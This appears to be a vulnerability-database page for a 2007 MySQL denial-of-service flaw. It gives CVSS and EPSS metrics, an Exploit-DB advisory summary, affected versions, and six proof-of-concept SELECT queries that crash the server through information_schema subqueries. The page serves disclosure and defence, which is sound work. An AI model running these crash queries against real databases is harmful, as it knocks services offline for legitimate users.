Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
2.1 |
|
AV:L/AC:L/Au:N/C:N/I:N/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 29724
Publication date : 2007-03-08 23h00 +00:00
Author : S.Streichsbier
EDB Verified : Yes
source: https://www.securityfocus.com/bid/22900/info
MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain select statements to database metadata.
An attacker can exploit this issue to crash the application, denying access to legitimate users. The attacker may also be able to execute arbitrary code, but this has not yet been confirmed.
NOTE: An attacker must be able to execute arbitrary SELECT statements on the vulnerable computer to exploit this issue. This may be through legitimate means or by exploiting other latent SQL-injection vulnerabilities.
Versions prior to 5.0.36 are vulnerable.
SELECT ASCII((SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT TRIM(LEADING FROM (SELECT table_name FROM information_schema.columns ORDER BY 1));
SELECT SUBSTR((SELECT table_name FROM information_schema.tables ORDER BY 1),1,1);
SELECT UPPER((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RTRIM((SELECT table_name FROM information_schema.tables ORDER BY 1));
SELECT RPAD((SELECT table_name FROM information_schema.tables ORDER BY 1),1,'lol');
Products Mentioned
Configuraton 0
Mysql>>Mysql >> Version To (including) 5.0.33
Mysql>>Mysql >> Version 5.0.0
Mysql>>Mysql >> Version 5.0.1
Mysql>>Mysql >> Version 5.0.2
Mysql>>Mysql >> Version 5.0.3
Mysql>>Mysql >> Version 5.0.4
Mysql>>Mysql >> Version 5.0.5
Mysql>>Mysql >> Version 5.0.10
Mysql>>Mysql >> Version 5.0.15
Mysql>>Mysql >> Version 5.0.16
Mysql>>Mysql >> Version 5.0.17
Mysql>>Mysql >> Version 5.0.20
Mysql>>Mysql >> Version 5.0.24
Mysql>>Mysql >> Version 5.0.30
Oracle>>Mysql >> Version 5.0.6
Oracle>>Mysql >> Version 5.0.7
Oracle>>Mysql >> Version 5.0.32
Oracle>>Mysql >> Version 5.0.41
References